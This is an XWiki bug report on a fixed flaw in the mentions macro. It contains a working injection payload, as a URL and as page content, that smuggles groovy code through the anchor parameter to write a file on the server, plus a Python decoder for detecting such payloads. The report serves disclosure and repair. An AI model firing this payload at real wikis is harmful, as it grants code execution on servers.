Details
- Bug
- Resolution: Fixed
- Blocker
- 12.5-rc-1
- None
Description
Steps to reproduce:
Open the URL
<server>/xwiki/bin/view/Main?sheet=CKEditor.HTMLConverter&language=en&sourceSyntax=xwiki%252F2.1&stripHTMLEnvelope=true&fromHTML=false&toHTML=true&text=%7B%7Bmention%20reference%3D%22XWiki.Translation%22%20anchor%3D%22%7B%7B%2Fhtml~%7D~%7D%7B%7Basync%20async%3D~%22true~%22%20cached%3D~%22false~%22%20context%3D~%22doc.reference~%22~%7D~%7D%7B%7Bgroovy~%7D~%7Dnew%20File(~%22%2Ftmp%2Fexploit.txt~%22).withWriter%20%7B%20out%20-%3E%20out.println(~%22owned!~%22)%3B%20%7D%7B%7B%2Fgroovy~%7D~%7D%7B%7B%2Fasync~%7D~%7D%22%2F%7D%7D
Alternatively:
Create a page with content
{{mention reference="XWiki.Translation" anchor="{{/html~}~}{{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit.txt~").withWriter { out -> out.println(~"owned!~"); }{{/groovy~}~}{{/async~}~}"/}}
(or insert this in the description of the user profile).
Expected result
No file /tmp/exploit.txt is created.
Actual result
A file /tmp/exploit.txt with the content owned! is created on the server (assuming the server runs Linux; on Windows the path needs to be adjusted).
This demonstrates a privilege escalation from view rights to programming rights. The root cause is insufficient escaping of parameters in the mentions macro: the ~" and ~}~} sequences in the anchor parameter decode to " and }}, so the value the macro receives contains a {{/html}} closer followed by an attacker-controlled async/groovy macro that is then rendered. The CKEditor HTML Converter is what makes this reachable with view rights only, because it parses and renders arbitrary XWiki syntax submitted in the request without requiring edit rights on any page. Without the converter, edit rights on any page (the user's own profile suffices) are enough.
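As an added illustration (not code from this report and not XWiki's own rendering code), the Python below decodes the proof-of-concept request the way a reviewer or detection engineer would: it pulls the `text` parameter out of the HTMLConverter URL, parses the mention macro's parameters under the XWiki 2.1 rule that `~` escapes the character that follows it, and lists the macro markers that the `anchor` value turns into once unescaped. The host `server.example`, the simplified parameter parser and the `escape_macro_parameter` helper are assumptions made for this example.

```python
"""Decode the HTMLConverter proof-of-concept and show what the mention
macro's `anchor` parameter becomes after XWiki 2.1 parameter unescaping.
Constructed example; the parser is a simplification, not XWiki's."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed copy of the request in the report; server.example stands in
# for the <server> placeholder.
POC_URL = (
    "http://server.example/xwiki/bin/view/Main?sheet=CKEditor.HTMLConverter"
    "&language=en&sourceSyntax=xwiki%252F2.1&stripHTMLEnvelope=true"
    "&fromHTML=false&toHTML=true&text=%7B%7Bmention%20reference%3D%22XWiki.Translation%22"
    "%20anchor%3D%22%7B%7B%2Fhtml~%7D~%7D%7B%7Basync%20async%3D~%22true~%22%20cached%3D~%22false~%22"
    "%20context%3D~%22doc.reference~%22~%7D~%7D%7B%7Bgroovy~%7D~%7Dnew%20File(~%22%2Ftmp%2Fexploit.txt~%22)"
    ".withWriter%20%7B%20out%20-%3E%20out.println(~%22owned!~%22)%3B%20%7D%7B%7B%2Fgroovy~%7D~%7D"
    "%7B%7B%2Fasync~%7D~%7D%22%2F%7D%7D"
)

MACRO_OPEN = re.compile(r"\{\{([A-Za-z][A-Za-z0-9_-]*)")
MACRO_MARK = re.compile(r"\{\{(/?)([A-Za-z][A-Za-z0-9_-]*)")


def converter_text_param(url: str) -> str:
    """Return the decoded `text` query parameter sent to CKEditor.HTMLConverter."""
    return parse_qs(urlsplit(url).query)["text"][0]


def parse_macro_parameters(wiki: str) -> tuple[str, dict[str, str]]:
    """Parse the first macro call in `wiki` and return (name, parameters).

    Values are returned *unescaped*: inside a quoted value a '~' escapes the
    next character, which is how the payload smuggles '"' and '}}' past the
    outer macro as ~" and ~}~}. Simplified model of the XWiki 2.1 rule.
    """
    m = MACRO_OPEN.match(wiki)
    if not m:
        raise ValueError("no macro at start of text")
    name, i, params = m.group(1), m.end(), {}
    while i < len(wiki):
        while i < len(wiki) and wiki[i].isspace():
            i += 1
        if wiki.startswith("/}}", i) or wiki.startswith("}}", i):
            return name, params
        eq = wiki.index("=", i)
        key = wiki[i:eq].strip()
        if wiki[eq + 1] != '"':
            raise ValueError("only quoted parameter values are handled")
        j, buf = eq + 2, []
        while j < len(wiki) and wiki[j] != '"':
            if wiki[j] == "~" and j + 1 < len(wiki):
                j += 1  # escape: the following character is taken literally
            buf.append(wiki[j])
            j += 1
        if j >= len(wiki):
            raise ValueError("unterminated parameter value")
        params[key] = "".join(buf)
        i = j + 1
    raise ValueError("unterminated macro")


def macros_smuggled_in(value: str) -> list[str]:
    """Macro open/close markers present in an unescaped parameter value.
    A legitimate anchor is an HTML fragment id and should contain none."""
    return ["{{" + slash + name for slash, name in MACRO_MARK.findall(value)]


def audit_converter_request(url: str) -> dict[str, list[str]]:
    """Map each mention parameter that carries macro markup to the markers found."""
    _, params = parse_macro_parameters(converter_text_param(url))
    return {k: macros_smuggled_in(v) for k, v in params.items() if macros_smuggled_in(v)}


def escape_macro_parameter(value: str) -> str:
    """Inverse of the unescape rule above: prefix '~', '"', '{' and '}' with
    '~' so the value round-trips through the parameter parser as data."""
    return "".join("~" + ch if ch in '~"{}' else ch for ch in value)


if __name__ == "__main__":
    name, params = parse_macro_parameters(converter_text_param(POC_URL))
    print(name, "anchor after unescaping:")
    print(params["anchor"])
    print("smuggled macro markers:", audit_converter_request(POC_URL))
```

Run stand-alone, it prints the anchor as the macro receives it: a `{{/html}}` closer followed by the async and groovy macros, which is exactly the text that the `~` escapes hid from the outer `{{mention ...}}` parser. The same `parse_macro_parameters` call run over stored page content or user profile descriptions (the report's alternative vector) flags stored payloads. `escape_macro_parameter` shows the property a fix needs: a value re-escaped before it is written back into wiki syntax parses to itself instead of to macros.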
Attachments
Issue Links
- causes
  - XWIKI-20500 Whitespace to the right of a mention is not properly displayed when the mention is inside a text, in view mode: appears stuck to the text (Closed)
  - XWIKI-20501 Mention macro is incorrectly generating whitespaces in the HTML (Closed)
- is caused by
  - XWIKI-17421 Support Mentions in platform (Closed)
- links to